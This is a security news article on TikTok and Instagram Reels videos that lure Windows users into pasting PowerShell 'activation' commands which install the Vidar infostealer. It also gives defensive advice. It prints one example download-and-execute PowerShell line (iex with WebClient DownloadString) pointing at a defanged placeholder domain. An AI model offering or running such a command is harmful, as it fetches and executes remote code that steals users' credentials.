A wave of coordinated scam campaigns across TikTok and Instagram Reels is luring Windows users with promises of free Microsoft Office, Windows activation, and premium software, only to silently deploy the Vidar infostealer via malicious PowerShell commands. Security researchers flagged the activity on June 11, 2026, warning that the short-form video scams have already compromised an unknown number of systems worldwide.

These campaigns mark a worrying evolution in social engineering, weaponizing trusted social platforms and legitimate system tools to bypass traditional security defenses. Videos typically feature a friendly face walking through a supposed activation hack or cracked software installation, encouraging viewers to copy and paste a seemingly harmless command into PowerShell running with administrator privileges. The result is a silent data theft that can strip a victim’s entire digital identity in minutes.

The Anatomy of the Scam

The attackers create polished, authentic-looking Reels that promise free access to expensive software. Popular lures include fake activators for Microsoft Office and Windows, “free premium” Spotify accounts, and full Adobe Creative Suite downloads. The videos exploit the short-form format’s inherent trust: a person on screen demonstrates the steps, adding a veneer of legitimacy that text‑based phishing attacks lack.

When a viewer follows the instructions, they are told to open PowerShell as an administrator and paste a specific string of code. The command is often obfuscated with comments or broken into segments to sidestep platform content filters. Once executed, the script silently reaches out to a remote server, downloads a payload, and executes it—all hidden within seconds. The video then directs the user to a fake download page that either does nothing or installs a benign‑looking decoy to mask the infection.

PowerShell: The Downloader in Plain Sight

PowerShell is a powerful scripting language built into Windows, essential for system administration and automation. Cybercriminals have long abused it because it is trusted, rarely blocked, and can execute code directly in memory without writing files to disk. The commands used in this campaign follow a familiar pattern:

  • Invoke-Expression (or its alias iex) runs a string as code.
  • New-Object System.Net.WebClient fetches a malicious script from a server.
  • Base64‑encoded payloads hide the true intent from casual inspection and automated scanners.

A typical line might look like:

powershell -Command "iex ((New-Object System.Net.WebClient).DownloadString('hxxp://malicious-domain[.]com/cfg.txt'))"

To a non‑technical user, the command appears cryptic but not inherently dangerous—especially when a charismatic influencer declares it “will just activate Office.” The reality is far more sinister: the downloaded script is often a downloader that fetches and installs Vidar, a commodity infostealer sold on underground forums for as little as $200.

Vidar Infostealer: A Persistent Threat

First documented in 2018, Vidar has evolved into one of the most prolific credential‑stealing malware families. Operating as malware‑as‑a‑service, customers can rent the panel and builder to run their own campaigns, making attribution almost impossible. Once on a system, Vidar quickly locates and exfiltrates:

  • Saved credentials from browsers (Chrome, Edge, Firefox, and others).
  • Cookies and session tokens that bypass multi‑factor authentication.
  • Cryptocurrency wallet files and browser extensions (MetaMask, Exodus, etc.).
  • Files matching patterns for banking details, saved credit cards, and identity documents.
  • Desktop screenshots and basic system information to enrich the stolen data.

The collected information is packed into a zip file and sent to the attacker’s command‑and‑control server. This data often fuels further fraud, identity theft, or is sold on darknet markets to other criminals. In some cases, Vidar serves as an initial access vector for ransomware gangs, who use the stolen credentials to move laterally through corporate networks.

Why Social Media Makes This Campaign Especially Dangerous

TikTok and Instagram Reels are engineered for rapid, immersive consumption, and the platforms’ algorithms push popular content to vast audiences before moderators can react. The scams exploit this speed:

  • Trust in video tutorials: Users seeking a quick fix for expensive software are predisposed to follow instructions without skepticism.
  • Younger demographic: A significant portion of Reels viewers is under 25, a group that may have less experience recognizing red flags.
  • Ephemeral content: Videos can disappear from feeds or be deleted by the uploader after a few hours, making investigation and takedown reactive at best.
  • Platform cross‑pollination: A single malicious video can be reposted across dozens of accounts, each with thousands of followers, creating a hydra‑like challenge for security teams.

Combined, these factors lower the bar for successful infection. A study from the cybersecurity firm Sekoia.io found that Vidar‑related campaigns increased 54% in the first quarter of 2026 compared to the previous year, largely driven by social media lure vectors.

Protecting Windows Systems from PowerShell-Based Malware

Microsoft has steadily increased the default security posture of Windows, but user behavior remains the weakest link. Here are concrete steps to guard against infostealer campaigns:

  • Never run commands from social media: No legitimate software activation or crack requires you to paste code into PowerShell. Treat any such request as malware.
  • Stick to official sources: Download software only from the Microsoft Store, vendor websites, or trusted re‑packagers. Free “activators” are universally malicious.
  • Enable controlled folder access and ransomware protection: Built into Windows Defender, these features can block unauthorized changes to sensitive data.
  • Use standard user accounts for daily tasks: Running as administrator only when absolutely necessary limits the damage malware can cause.
  • Keep Windows and security products updated: Defender signatures are updated multiple times daily and often detect Vidar variants without additional settings.
  • Apply PowerShell constrained language mode or execution policies: Enterprises can enforce AllSigned or RemoteSigned policies through Group Policy, restricting ability to run arbitrary scripts.

Windows 11’s enhanced hardware security requirements—such as TPM 2.0, Secure Boot, and Virtualization‑Based Security—also help isolate malicious code, but no system is immune if the user deliberately overrides protections.

Industry Response and Next Steps

As of June 11, 2026, neither Microsoft nor the major social media platforms had issued formal statements about the ongoing campaigns. Historically, Microsoft has responded to such threats by updating Defender signatures and clarifying official support channels, but the company does not typically comment on individual malware families outside of its Threat Intelligence blog. TikTok and Instagram rely on automated detection and user reports to remove malicious content; users who encounter these videos should report them immediately using the in‑app reporting tools.

This incident reignites the debate around the responsibility of social platforms to police scam content. While both TikTok and Instagram prohibit “illegal or regulated activities,” their moderation systems still struggle with real‑time, technically literate attacks. Some legislators have proposed requiring platforms to run promotion‑based scams through a human review queue, but for now, the onus falls heavily on the user.

A Shifting Threat Landscape

The Vidar‑TikTok campaign illustrates a broader trend: malware distribution is no longer confined to shady downloads or email attachments. Threat actors now meet victims in the digital spaces they already trust, using tools built into the operating system against it. For Windows enthusiasts, this is a stark reminder that curiosity and a deal‑seeking mindset can be weaponized.

The convergence of legitimate platforms, social engineering, and living‑off‑the‑land binaries like PowerShell means defenders must evolve as well. Security awareness training must now cover social media hygiene, not just email. Meanwhile, the security community monitors the situation for new Vidar variants and domain registrations, working to disrupt the infrastructure behind these scams.

Ultimately, the most effective defense is a healthy dose of skepticism: if a stranger on TikTok offers you a free Office license, they’re not a hero—they’re a vector for theft. Stay safe, think twice before you paste, and keep your system’s defenses on high alert.